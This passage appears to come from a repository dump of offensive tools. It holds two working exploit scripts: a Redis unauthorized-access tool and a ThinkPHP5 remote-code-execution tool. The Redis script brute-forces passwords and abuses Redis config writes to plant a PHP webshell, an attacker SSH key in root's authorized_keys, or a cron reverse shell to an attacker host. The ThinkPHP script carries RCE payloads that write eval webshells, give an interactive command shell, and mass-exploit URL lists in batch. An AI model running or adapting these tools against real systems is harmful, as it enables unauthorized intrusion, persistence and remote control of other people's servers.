getV11Session(url) 126 | elif args.tdoaversion == 2017: 127 | get2017Session(url) 128 | else: 129 | parser.print_help() 130 | -------------------------------------------------------------------------------- /Redis-Getshell/Redis-Getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: UTF-8 -*- 3 | import os 4 | import sys 5 | import socket 6 | from argparse import ArgumentParser 7 | 8 | def Banner(): 9 | banner = """ 10 | ____ ____ ___ _ ____ ____ _ _ ____ _ _ 11 | |__/ |___ | \ | [__ [__ |__| |___ | | 12 | | \ |___ |__/ | ___] ___] | | |___ |___ |___ 13 | Python3 By Forever404 14 | Usage:python3 RedisShell.py -H 192.168.10.128 -P 6379 15 | Usage:python3 RedisShell.py -H 192.168.10.128 -P 6379 -p 123456 16 | """ 17 | print(banner) 18 | 19 | class Check(): 20 | def __init__(self): 21 | self.BUFSIZ = 65535 22 | self.PASSWORD = '' 23 | self.TIMEOUT = 10 24 | self.PORT = 6379 25 | self.HOST = '' 26 | self.parsing() 27 | 28 | def parsing(self): 29 | descript_string = 'The function of this script is to determine whether there is unauthorized access to redis and Brute force redis password' 30 | parse = ArgumentParser(description=descript_string) 31 | parse.add_argument("-H", help="please enter a target") # 可以添加检测IP地址是否合法 32 | parse.add_argument('-P', help="Please enter the port, otherwise the default is 6379") # 没有参数值则默认为6379 33 | parse.add_argument('-a', help="please enter the password,") 34 | args = parse.parse_args() 35 | 36 | if args.H: 37 | self.HOST = args.H 38 | else: 39 | sys.exit("H parameter cannot be empty") 40 | if args.P: 41 | self.PORT = int(args.P) 42 | if args.a: 43 | self.PASSWORD = args.a 44 | 45 | self.Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 46 | self.Socket.connect((self.HOST, int(self.PORT))) 47 | 48 | def check(self): 49 | if self.PASSWORD: 50 | self.Socket.send(bytes("AUTH {}\n".format(self.PASSWORD),encoding="UTF-8")) 51 | receive = self.Socket.recv(self.BUFSIZ) 52 | if 'OK' in bytes.decode(receive): 53 | return self.Socket 54 | else: 55 | sys.exit("wrong password") 56 | self.Socket.send(b'info\n') 57 | receive = self.Socket.recv(self.BUFSIZ) 58 | if 'redis_version' in bytes.decode(receive): 59 | print("it is exist vulnerable") 60 | return self.Socket 61 | elif 'NOAUTH Authentication required' in bytes.decode(receive): 62 | print("AUTH Authentication required") 63 | while True: 64 | key = input("Please choose whether you need brute force cracking?yes or no:") 65 | if key == 'yes' or key == 'y' or key == 'Y': 66 | password_path = input("please input a ture password path:") 67 | Brute = BruteForce(host=self.HOST, port=self.PORT, passwd_path=password_path,Socket=self.Socket,BUFSIZ=self.BUFSIZ) 68 | Brute.main() 69 | return self.Socket 70 | elif key =='no' or key =='NO' or key=="n" or key=="N": 71 | self.Socket.close() 72 | sys.exit() 73 | else: 74 | print("I Don't know what you do,please try again!") 75 | else: 76 | print("I don't know whether to enable redis!") 77 | 78 | class BruteForce(): 79 | def __init__(self,host,port,passwd_path,Socket,BUFSIZ): 80 | self.passwd_path = passwd_path 81 | self.thread_number = 20 82 | self.Socket = Socket 83 | self.BUFSIZ = BUFSIZ 84 | self.host = host 85 | self.port = port 86 | 87 | def check(self): 88 | if os.path.exists(self.passwd_path): 89 | if os.path.isfile(self.passwd_path): 90 | return True 91 | else: 92 | sys.exit("{} not a file".format(self.passwd_path)) 93 | else: 94 | sys.exit("{} not found".format(self.passwd_path)) 95 | 96 | def concet(self,password): 97 | self.Socket.send(bytes("AUTH {}\n".format(password.decode('UTF-8')), encoding="UTF-8")) 98 | res = self.Socket.recv(self.BUFSIZ) 99 | 100 | if 'OK' in bytes.decode(res): 101 | print('[+]:password---{}'.format(password.decode("UTF-8"))) 102 | return True 103 | else: 104 | print("[-]:{}".format(password.decode("UTF-8"))) 105 | 106 | def main(self): 107 | if self.check(): 108 | with open(self.passwd_path) as file: 109 | for line in file.readlines(): 110 | if "'" not in line and '"' not in line: 111 | line = line.rstrip('\n').encode("UTF-8") 112 | if self.concet(line): 113 | break 114 | 115 | class Shell(): 116 | def __init__(self): 117 | self.save = 'save' 118 | self.BUFSIZ = 65535 119 | start = Check() 120 | self.Socket = start.check() 121 | print("1:Webshell\n"+"2:ssh\n"+"3:bash\n") 122 | 123 | number = input("please choose which shell or exit:") 124 | 125 | if number=='exit': 126 | sys.exit("Good bye!!") 127 | elif number=='1': 128 | self.Webshell() 129 | elif number=='2': 130 | self.ssh() 131 | elif number=='3': 132 | self.bash() 133 | else: 134 | print("Sorry,I Dont't Know!") 135 | 136 | def send(self,content): 137 | self.Socket.send(content) 138 | print("[+]:{}".format(content.decode("UTF-8"))) 139 | res = self.Socket.recv(self.BUFSIZ) 140 | print(res.decode("UTF-8")) 141 | 142 | def write(self,dir,dbfilename,payload): 143 | dirtemp = input("Please select the writing dir, otherwise the default:") 144 | if dirtemp: 145 | dir = dirtemp 146 | self.send(bytes("config set dir {}\n".format(dir), encoding="UTF-8")) 147 | else: 148 | self.send(bytes("config set dir {}\n".format(dir), encoding="UTF-8")) 149 | 150 | dbfilenametemp = input("Please select the writing dbfilename, otherwise the default:") 151 | if dbfilenametemp: 152 | dbfilename = dbfilenametemp 153 | self.send(bytes("config set dbfilename {}\n".format(dbfilename), encoding="UTF-8")) 154 | else: 155 | self.send(bytes("config set dbfilename {}\n".format(dbfilename), encoding="UTF-8")) 156 | 157 | payloadtemp = input("Please select the writing payload, otherwise the default:") 158 | if payloadtemp: 159 | payload = payloadtemp 160 | self.send(bytes('set payload {}\n'.format(payload), encoding="UTF-8")) 161 | else: 162 | self.send(bytes('set payload {}\n'.format(payload), encoding="UTF-8")) 163 | self.send(b"save\n") 164 | 165 | def Webshell(self): 166 | payload = '"<?php phpinfo(); ?>"' 167 | dbfilename = 'trojan.php' 168 | dir = '/var/www/html/' 169 | self.write(dir=dir,dbfilename=dbfilename,payload=payload) 170 | 171 | def ssh(self): 172 | while True: 173 | path = input("input your ssh id_rsa.pub path or exit:") 174 | if path=='exit': 175 | sys.exit("God bye!!") 176 | elif os.path.isfile(path): 177 | with open(path,'r') as file: 178 | id_rsa_pub = file.readline().rstrip('\n') 179 | break 180 | else: 181 | print("this path {} is not found!".format(path)) 182 | 183 | payload = r'"\n\n\n\{}\n\n\n"'.format(id_rsa_pub) 184 | dbfilename = 'authorized_keys' 185 | dir = '/root/.ssh/' 186 | self.write(dir=dir, dbfilename=dbfilename, payload=payload) 187 | 188 | def bash(self): 189 | while True: 190 | addr = input("input your server addr or exit:") 191 | port = input("input your server port or exit:") 192 | if addr=='exit' or port=='exit': 193 | sys.exit("Good bye!!!") 194 | elif addr and port: 195 | print("your server addr and port is {}:{}".format(addr,port)) 196 | break 197 | 198 | payload = r'"\n\n\n* * * * * bash -i >& /dev/tcp/{}/{} 0>&1\n\n\n"'.format(addr,port) 199 | dbfilename = 'root' 200 | dir = '/var/spool/cron/' 201 | self.write(dir=dir,dbfilename=dbfilename,payload=payload) 202 | 203 | if __name__ == '__main__': 204 | Banner() 205 | shell = Shell() 206 | 207 | -------------------------------------------------------------------------------- /thinkphp5/tp5-getshell/tp5-getshell.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | #Author:LSA 3 | #Description: thinkphp5 rce getshell 4 | #Date:20181211 5 | 6 | import requests 7 | import optparse 8 | import os 9 | import datetime 10 | import Queue 11 | import threading 12 | import sys 13 | from bs4 import BeautifulSoup 14 | from requests.packages import urllib3 15 | 16 | reload(sys) 17 | sys.setdefaultencoding('utf-8') 18 | 19 | lock = threading.Lock() 20 | 21 | q0 = Queue.Queue() 22 | threadList = [] 23 | global succ 24 | succ = 0 25 | headers = {} 26 | headers["User-Agent"] = 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11' 27 | 28 | 29 | poc0 = '/index.php/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' 30 | poc1 = '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' 31 | poc2 = '/index.php/?s=index/\\think\Request/input&filter=phpinfo&data=1' 32 | poc3 = '/index.php?s=/index/\\think\\request/cache&key=1|phpinfo' 33 | poclist = [poc0,poc1,poc2,poc3] 34 | 35 | exp0 = '/index.php/?s=index/\\think\\template\driver\\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>' 36 | exp1 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>' 37 | exp2 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[xxxxxx]);?>\'>zxc2.php' 38 | 39 | explist = [exp0,exp1,exp2] 40 | 41 | cmdtest = 'echo zxc000' 42 | cmdexp0 = '/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[l][]={}' 43 | cmdexp1 = '/index.php?s=index/\\think\Request/input&filter=system&data={}' 44 | cmdexp2 = '/index.php?s=/index/\\think\\request/cache&key={}|system' 45 | cmdexp3 = '/index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={}' 46 | 47 | cmdlist = [cmdexp0,cmdexp1,cmdexp2,cmdexp3] 48 | 49 | 50 | 51 | def tp5_getshell_check(tgtUrl,timeout): 52 | 53 | for p in range(len(poclist)): 54 | 55 | 56 | fullUrl = tgtUrl + poclist[p] 57 | #print fullUrl 58 | try: 59 | rst = requests.get(fullUrl,headers=headers,timeout=timeout,verify=False) 60 | except requests.exceptions.Timeout: 61 | print 'phpinfo checked fail! Error: Timeout' 62 | continue 63 | except requests.exceptions.ConnectionError: 64 | print 'phpinfo checked fail! Error: ConnectionError' 65 | continue 66 | except: 67 | print 'phpinfo checked fail! Error: Unkonwn error0' 68 | continue 69 | 70 | if rst.status_code == 200: 71 | 72 | if(rst.text.index('PHP Version')): 73 | print 'phpinfo checked success! poc' + str(p) + ': ' + poclist[p] + '\n' 74 | 75 | else: 76 | soup = BeautifulSoup(rst.text,'lxml') 77 | if(soup.find('title')): 78 | print 'Poc' + str(p) + ' phpinfo checked fail! Error title: ' + str(soup.title.string) + '\n' 79 | else: 80 | print 'Poc' + str(p) + ' phpinfo checked fail! ' + str(rst.text[0:11]) + '\n' 81 | 82 | else: 83 | print 'Poc' + str(p) + ' phpinfo checked fail! status code: ' + str(rst.status_code) + '\n' 84 | continue 85 | 86 | def tp5_getshell_cmdshell(tgtUrl,timeout): 87 | for c in range(len(cmdlist)): 88 | fullUrl = tgtUrl + cmdlist[c].format(cmdtest) 89 | #print fullUrl 90 | try: 91 | rst = requests.get(fullUrl,headers=headers,timeout=timeout,verify=False) 92 | #print rst.text 93 | 94 | if rst.status_code == 200: 95 | if 'zxc000' in rst.text: 96 | print 'Getshell cmd success! now use cmdexp' + str(c) + ': ' + cmdlist[c] + '\n' 97 | while True: 98 | command = raw_input("cmd>>> ") 99 | if command == 'exit': 100 | break 101 | 102 | cmdexp = cmdlist[c].format(command) 103 | fullUrl1 = tgtUrl + cmdexp 104 | cmdResult = requests.get(fullUrl1,headers=headers,timeout=7) 105 | print cmdResult.text 106 | break 107 | 108 | else: 109 | print 'Cmdshell' + str(c) + ' checked fail! status code: ' + str(rst.status_code) + '\n' 110 | continue 111 | 112 | 113 | except requests.exceptions.Timeout: 114 | #print 'Getcmdshell fail! Error: Timeout' 115 | continue 116 | except requests.exceptions.ConnectionError: 117 | #print 'Getcmdshell fail! Error: ConnectionError' 118 | continue 119 | except: 120 | #print 'Getcmdshell fail! Error: Unkonwn error0' 121 | continue 122 | 123 | 124 | 125 | print 'Over' 126 | 127 | def tp5_getshell_exploit(tgtUrl,timeout): 128 | 129 | for e in range(len(explist)): 130 | 131 | fullUrl = tgtUrl + explist[e] 132 | #print fullUrl 133 | try: 134 | rst = requests.get(fullUrl,headers=headers,timeout=timeout,verify=False) 135 | except requests.exceptions.Timeout: 136 | print 'Getshell exploited fail! Error: Timeout' 137 | continue 138 | except requests.exceptions.ConnectionError: 139 | print 'Getshell exploited fail! Error: ConnectionError' 140 | continue 141 | except: 142 | print 'Getshell exploited fail! Error: Unkonwn error0' 143 | continue 144 | 145 | if rst.status_code == 200: 146 | 147 | rst1 = requests.get(tgtUrl+'/zxc'+str(e)+'.php',timeout=timeout,verify=False) 148 | if rst1.status_code == 200: 149 | if rst1.text == '': 150 | print 'Getshell! ' + tgtUrl + '/zxc' + str(e) + '.php|pwd:xxxxxx' + '\n' 151 | exit() 152 | else: 153 | soup = BeautifulSoup(rst1.text,'lxml') 154 | if(soup.find('title')): 155 | print 'Exp' + str(e) + ' getshell exploited fail! Error title: ' + str(soup.title.string) + '\n' 156 | else: 157 | print 'Exp' + str(e) + ' getshell exploited fail! ' + str(rst1.text[0:11]) + '\n' 158 | else: 159 | 160 | print 'Exp' + str(e) + ' getshell exploited fail! Shell status code: ' + str(rst1.status_code) + '\n' 161 | else: 162 | 163 | print 'Exp' + str(e) + ' getshell exploited fail! status code: ' + str(rst.status_code) + '\n' 164 | 165 | 166 | def tp5_getshell_batch(timeout,f4success): 167 | urllib3.disable_warnings() 168 | global countLines 169 | while(not q0.empty()): 170 | 171 | tgtUrl = q0.get() 172 | for e in range(len(explist)): 173 | 174 | fullUrl = tgtUrl + explist[e] 175 | #print fullUrl 176 | qcount = q0.qsize() 177 | print 'Checking: ' + fullUrl + '---[' + str(countLines - qcount) + '/' + str(countLines) + ']' 178 | 179 | try: 180 | rst = requests.get(fullUrl,headers=headers,timeout=timeout,verify=False) 181 | 182 | except requests.exceptions.Timeout: 183 | #print 'Getshell failed! Error: Timeout' 184 | 185 | continue 186 | 187 | except requests.exceptions.ConnectionError: 188 | #print 'Getshell failed! Error: ConnectionError' 189 | 190 | continue 191 | 192 | except: 193 | #print 'Getshell failed! Error: Unkonwn error' 194 | 195 | continue 196 | 197 | if rst.status_code == 200: 198 | try: 199 | rst1 = requests.get(tgtUrl+'/zxc'+str(e)+'.php',timeout=timeout,verify=False) 200 | 201 | if rst1.status_code == 200: 202 | 203 | 204 | if rst1.text == '': 205 | shellAddr = tgtUrl + '/zxc' + str(e) + '.php|pwd:xxxxxx' 206 | print 'Getshell! ' + shellAddr 207 | lock.acquire() 208 | f4success.write('shell: '+shellAddr+'\n') 209 | lock.release() 210 | global succ 211 | succ = succ + 1 212 | break 213 | else: 214 | continue 215 | else: 216 | 217 | #errorState = 'Getshell failed! Error: zxc.php' + str(e) + ' ' + str(rst1.status_code) 218 | continue 219 | 220 | except requests.exceptions.Timeout: 221 | #print 'Getshell failed! Error: Timeout' 222 | 223 | continue 224 | 225 | except requests.exceptions.ConnectionError: 226 | #print 'Getshell failed! Error: ConnectionError' 227 | 228 | continue 229 | 230 | except: 231 | #print 'Getshell failed! Error: Unkonwn error' 232 | 233 | continue 234 | 235 | 236 | 237 | else: 238 | #print 'Getshell failed! status code: ' + str(rst.status_code) 239 | 240 | continue 241 | 242 | 243 | 244 | 245 | if __name__ == '__main__': 246 | 247 | print ''' 248 | **************************************************** 249 | * thinkphp5 rce getshell(controller) * 250 | * Coded by LSA * 251 | **************************************************** 252 | ''' 253 | 254 | parser = optparse.OptionParser('python %prog ' +'-h (manual)',version='%prog v1.0') 255 | 256 | parser.add_option('-u', dest='tgtUrl', type='string', help='single url') 257 | 258 | parser.add_option('-f', dest='tgtUrlsPath', type ='string', help='urls filepath[exploit default]') 259 | 260 | parser.add_option('-s', dest='timeout', type='int', default=7, help='timeout(seconds)') 261 | 262 | parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads') 263 | 264 | #parser.add_option('--check', dest='check',action='store_true', help='check url but not exploit[default]') 265 | 266 | parser.add_option('--exploit', dest='exploit',action='store_true', help='exploit url') 267 | 268 | parser.add_option('--cmdshell', dest='cmdshell',action='store_true', help='cmd shell mode') 269 | 270 | (options, args) = parser.parse_args() 271 | 272 | #check = options.check 273 | 274 | exploit = options.exploit 275 | 276 | cmdshell = options.cmdshell 277 | 278 | timeout = options.timeout 279 | 280 | tgtUrl = options.tgtUrl 281 | 282 | if tgtUrl and (exploit is None and cmdshell is None): 283 | 284 | tp5_getshell_check(tgtUrl,timeout) 285 | 286 | if tgtUrl and exploit: 287 | 288 | tp5_getshell_exploit(tgtUrl,timeout) 289 | 290 | if tgtUrl and cmdshell: 291 | 292 | tp5_getshell_cmdshell(tgtUrl,timeout) 293 | 294 | 295 | if options.tgtUrlsPath: 296 | tgtFilePath = options.tgtUrlsPath 297 | threads = options.threads 298 | nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S') 299 | os.mkdir('batch_result/'+str(nowtime)) 300 | f4success = open('batch_result/'+str(nowtime)+'/'+'success.txt','w') 301 | #f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w') 302 | urlsFile = open(tgtFilePath) 303 | global countLines 304 | countLines = len(open(tgtFilePath,'rU').readlines()) 305 | 306 | print '===Total ' + str(countLines) + ' urls===' 307 | 308 | for urls in urlsFile: 309 | fullUrls = urls.strip() 310 | q0.put(fullUrls) 311 | for thread in range(threads): 312 | t = threading.Thread(target=tp5_getshell_batch,args=(timeout,f4success)) 313 | t.start() 314 | threadList.append(t) 315 | for th in threadList: 316 | th.join() 317 | 318 | 319 | print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines) + ']###' 320 | print 'Results were saved in ./batch_result/' + str(nowtime) + '/' 321 | f4success.close() 322 | #f4fail.close() 323 | --------------------------------------------------------------------------------